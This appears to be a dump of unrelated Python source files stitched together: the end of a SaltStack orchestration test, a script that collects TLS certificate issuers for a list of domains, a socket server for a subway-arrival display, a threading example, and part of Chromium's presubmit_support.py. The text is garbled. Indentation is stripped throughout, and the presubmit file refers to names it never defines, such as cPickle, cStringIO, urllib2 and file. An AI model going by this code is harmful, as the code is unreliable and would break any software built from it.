while True:
event = listener.get_event(full=True)
if event is None:
continue
if event.get('tag', '') == 'salt/run/{0}/ret'.format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for state in ret:
data = ret[state]
# Each state should be successful
self.assertEqual(data['comment'], 'Success!')
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
def test_orchestration_onchanges_and_prereq(self):
'''
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
orch_sls = os.path.join(self.base_env, 'orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
manage_a_file:
salt.state:
- tgt: minion
- sls:
- orch.req_test
do_onchanges:
salt.function:
- tgt: minion
- name: test.ping
- onchanges:
- salt: manage_a_file
do_prereq:
salt.function:
- tgt: minion
- name: test.ping
- prereq:
- salt: manage_a_file
'''))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
try:
jid1 = self.run_run_plus(
'state.orchestrate',
'orch',
test=True,
__reload_config=True).get('jid')
# Run for real to create the file
self.run_run_plus(
'state.orchestrate',
'orch',
__reload_config=True).get('jid')
# Run again in test mode. Since there were no changes, the
# requisites should not fire.
jid2 = self.run_run_plus(
'state.orchestrate',
'orch',
test=True,
__reload_config=True).get('jid')
finally:
try:
os.remove(os.path.join(TMP, 'orch.req_test'))
except OSError:
pass
assert jid1 is not None
assert jid2 is not None
tags = {'salt/run/{0}/ret'.format(x): x for x in (jid1, jid2)}
ret = {}
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] in tags:
ret[tags.pop(event['tag'])] = self.repack_state_returns(
event['data']['return']['data']['master']
)
if not tags:
# If tags is empty, we've grabbed all the returns we
# wanted, so let's stop listening to the event bus.
break
finally:
del listener
signal.alarm(0)
for sls_id in ('manage_a_file', 'do_onchanges', 'do_prereq'):
# The first time through, all three states should have a None
# result, while the second time through, they should all have a
# True result.
assert ret[jid1][sls_id]['result'] is None, \
'result of {0} ({1}) is not None'.format(
sls_id,
ret[jid1][sls_id]['result'])
assert ret[jid2][sls_id]['result'] is True, \
'result of {0} ({1}) is not True'.format(
sls_id,
ret[jid2][sls_id]['result'])
# The file.managed state should have shown changes in the test mode
# return data.
assert ret[jid1]['manage_a_file']['changes']
# After the file was created, running again in test mode should have
# shown no changes.
assert not ret[jid2]['manage_a_file']['changes'], \
ret[jid2]['manage_a_file']['changes']
|
ca.py | import ssl
import socket
import OpenSSL
import sqlite3
import signal
from functools import wraps
from numpy.core.numeric import count_nonzero
import requests
from multiprocessing import Process, Value
TIMEOUT = Value('i', 5)
cMax = Value('i', 2)
ca_num = Value('i', 0)
class TimeoutException(Exception):
pass
def deadline(timeout, *args):
def decorate(f):
def handler(signum, frame):
raise TimeoutException() #when the signal have been handle raise the exception
@wraps(timeout, *args)
def new_f(*args):
signal.signal(signal.SIGALRM, handler) #link the SIGALARM signal to the handler
signal.alarm(timeout) #create an alarm of timeout second
res = f(*args)
signal.alarm(0) #reinitiate the alarm
return res
return new_f
return decorate
@deadline(TIMEOUT.value)
def get_certificate(host, port=443, timeout=10):
context = ssl.create_default_context()
context.set_ciphers('DEFAULT:@SECLEVEL=1')
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
conn = socket.create_connection((host, port))
sock = context.wrap_socket(conn, server_hostname=host)
sock.settimeout(timeout)
try:
der_cert = sock.getpeercert(True)
finally:
sock.close()
return ssl.DER_cert_to_PEM_cert(der_cert)
@deadline(60)
def url_direct(user):
user = 'http://' + user
user = requests.get(user).url.split('/')[2]
return user
@deadline(60)
def url_with_header(user):
user = 'http://' + user
user = requests.head(user).headers['location'].split('/')[2]
return user
def get_url(user, counter, error):
try:
user = url_direct(user)
except TimeoutException:
print(" Impossible to get url (TimeoutException) from ", user)
cur.execute("INSERT INTO errors VALUES (?, ?, ?)", (user, user.split('.')[len(user.split('.'))-1], error))
counter = cMax.value-1
except:
try:
user = url_with_header(user)
except TimeoutException:
print(" Impossible to get url (TimeoutException) from ", user)
cur.execute("INSERT INTO errors VALUES (?, ?, ?)", (user, user.split('.')[len(user.split('.'))-1], error))
counter = cMax.value-1
except:
print(" Impossible to get url from ", user)
cur.execute("INSERT INTO errors VALUES (?, ?, ?)", (user, user.split('.')[len(user.split('.'))-1], error))
counter = cMax.value-1
return user, counter
def processus(user):
counter = 0
ok = False
while ok == False:
try:
certificate = get_certificate(user)
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, certificate)
provider = x509.get_issuer().organizationName
cur.execute("INSERT INTO ca VALUES (?, ?, ?)", (user, provider, ca_num.value))
print(user, ": ", provider)
ok = True
except TimeoutException as e:
if (counter == cMax.value-1):
if (TIMEOUT.value != 60):
TIMEOUT.value = 60
counter -= counter
else:
cur.execute("INSERT INTO errors VALUES (?, ?, ?)", (user, user.split('.')[len(user.split('.'))-1], repr(e)))
else:
user, counter = get_url(user, counter, repr(e))
print(" ", repr(e), user)
ok = False
counter += 1
except Exception as e:
if (counter == cMax.value-1):
cur.execute("INSERT INTO errors VALUES (?, ?, ?)", (user, user.split('.')[len(user.split('.'))-1], repr(e)))
else:
user, counter = get_url(user, counter, repr(e))
print(" ", repr(e), user)
ok = False
counter += 1
finally:
con.commit()
ca_num.value += 1
if counter == cMax.value:
ok = True
con = sqlite3.connect('ca-providers.db')
cur = con.cursor()
try:
cur.execute("CREATE TABLE ca (ca_user, ca_provider, ca_num)")
except sqlite3.OperationalError:
cur.execute("DELETE FROM ca")
try:
cur.execute("CREATE TABLE errors (user, extension, error)")
except sqlite3.OperationalError:
cur.execute("DELETE FROM errors")
con.commit()
debut = 0
with open("list1m2020.csv", "r") as f:
for line in f:
user = line.split()[0]
p = Process(target=processus, args=(user,))
p.start()
p.join()
if (TIMEOUT.value != 5):
TIMEOUT.value = 5
con.close() |
serving.py | """Socket server."""
import logging
import socketserver
import threading
import animation
_PORT = 7829
_logger = logging.getLogger('subway_board.serving')
class _TCPServer(socketserver.TCPServer):
allow_reuse_address = True
class Server:
"""Socket server that sends current frame from ETA image on every connection."""
def __init__(self, port: int, animator: animation.Animator):
self._port = port
self._animator = animator
class Handler(socketserver.StreamRequestHandler):
"""Handle TCP requests."""
def handle(self) -> None:
# Now wait for the next frame before sending data. This could be a
# few seconds or immediate, depending on whether the animation is
# currently static or in scroll.
frame = animator.wait_for_new_frame()
frame.save(self.wfile, 'PNG', optimize=True)
self._handler_class = Handler
def start(self) -> None:
"""Starts the socket server in a background thread."""
threading.Thread(target=self._start, daemon=True).start()
def _start(self) -> None:
"""Serves the current frame on any socket connection."""
_logger.info('Waiting for the animator to be ready to produce frames...')
self._animator.event_ready.wait()
_logger.info('... ready!')
with _TCPServer(('0.0.0.0', self._port), self._handler_class) as server:
_logger.info('Listening on port %d', self._port)
server.serve_forever()
|
tfoo.py | import threading
import pub_foo
def say_hello(msg):
print('Say hello from %s' % msg)
def test():
threading.Thread(target=pub_foo.proxy_say_hello, args=('function',)).start()
if __name__ == '__main__':
threading.Thread(target=pub_foo.proxy_say_hello, args=('module',)).start()
test()
|
presubmit_support.py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import pickle # Exposed through the API.
import cpplint
import io # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib.request, urllib.error, urllib.parse # Exposed through the API.
import urllib.parse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_utils # Exposed through the API
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception):
pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return stdout, stderr
sigint_handler = SigintHandler()
class ThreadPool(object):
def __init__(self, pool_size=None):
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of "python"
to vpython invocations.
"""
vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
try:
start = time.time()
p = subprocess.Popen(cmd, **test.kwargs)
stdout, _ = sigint_handler.wait(p, test.stdin)
duration = time.time() - start
except OSError as e:
duration = time.time() - start
return test.message(
'%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
if p.returncode != 0:
return test.message(
'%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
if test.info:
return test.info('%s (%4.2fs)' % (test.name, duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
def __init__(self, input_stream=None, output_stream=None):
self.input_stream = input_stream
self.output_stream = output_stream
self.reviewers = []
self.more_cc = []
self.written_output = []
self.error_count = 0
def prompt_yes_no(self, prompt_string):
self.write(prompt_string)
if self.input_stream:
response = self.input_stream.readline().strip().lower()
if response not in ('y', 'yes'):
self.fail()
else:
self.fail()
def fail(self):
self.error_count += 1
def should_continue(self):
return not self.error_count
def write(self, s):
self.written_output.append(s)
if self.output_stream:
self.output_stream.write(s)
def getvalue(self):
return ''.join(self.written_output)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, host):
self.host = host
self.cache = {}
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
values = list(labelinfo.get('values', {}).keys())
try:
max_value = max(int(v) for v in values)
reviewers = [r for r in labelinfo.get('all', [])
if r.get('value', 0) == max_value]
except ValueError: # values is the empty list
reviewers = []
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
def EnsureCQIncludeTrybotsAreAdded(self, cl, bots_to_include, message):
"""Helper for any PostUploadHook wishing to add CQ_INCLUDE_TRYBOTS.
Merges the bots_to_include into the current CQ_INCLUDE_TRYBOTS list,
keeping it alphabetically sorted. Returns the results that should be
returned from the PostUploadHook.
Args:
cl: The git_cl.Changelist object.
bots_to_include: A list of strings of bots to include, in the form
"master:slave".
message: A message to be printed in the case that
CQ_INCLUDE_TRYBOTS was updated.
"""
description = cl.GetDescription(force=True)
trybot_footers = git_footers.parse_footers(description).get(
git_footers.normalize_name('Cq-Include-Trybots'), [])
prior_bots = []
for f in trybot_footers:
prior_bots += [b.strip() for b in f.split(';') if b.strip()]
if set(prior_bots) >= set(bots_to_include):
return []
all_bots = ';'.join(sorted(set(prior_bots) | set(bots_to_include)))
description = git_footers.remove_footer(description, 'Cq-Include-Trybots')
description = git_footers.add_footer(
description, 'Cq-Include-Trybots', all_bots,
before_keys=['Change-Id'])
cl.UpdateDescription(description, force=True)
return [self.PresubmitNotifyResult(message)]
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
# Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
DEFAULT_WHITE_LIST = (
# C++ and friends
r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
# Scripts
r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
# Other
r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
r".+\.fidl$"
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_BLACK_LIST = (
r"testing_support[\\\/]google_appengine[\\\/].*",
r".*\bexperimental[\\\/].*",
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
# Output directories (just in case)
r".*\bDebug[\\\/].*",
r".*\bRelease[\\\/].*",
r".*\bxcodebuild[\\\/].*",
r".*\bout[\\\/].*",
# All caps files like README and LICENCE.
r".*\b[A-Z0-9_]{2,}$",
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r"(|.*[\\\/])\.git[\\\/].*",
r"(|.*[\\\/])\.svn[\\\/].*",
# There is no point in processing a patch file.
r".+\.diff$",
r".+\.patch$",
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cPickle = cPickle
self.cpplint = cpplint
self.cStringIO = cStringIO
self.fnmatch = fnmatch
self.gclient_utils = gclient_utils
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.marshal = marshal
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.pickle = pickle
self.re = re
self.subprocess = subprocess
self.tempfile = tempfile
self.time = time
self.traceback = traceback
self.unittest = unittest
self.urllib2 = urllib2
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'python'. This is interpreted in CallCommand to
# convert to vpython in order to allow scripts in other repos (e.g. src.git)
# to automatically pick up that repo's .vpython file, instead of inheriting
# the one in depot_tools.
self.python_executable = 'python'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with "base/containers/hash_tables.h" instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof.
"""
dir_with_slash = normpath("%s/" % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return [x for x in self.change.AffectedFiles(include_deletes, file_filter) if normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash)]
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug("LocalPaths: %s", paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn("AffectedTestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return [x for x in self.AffectedFiles(include_deletes=False, **kwargs) if x.IsTestableFile()]
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
"""Filters out files that aren't considered "source file".
If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST
and InputApi.DEFAULT_BLACK_LIST is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and
not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in "new" version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in list(diffs.items()))
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
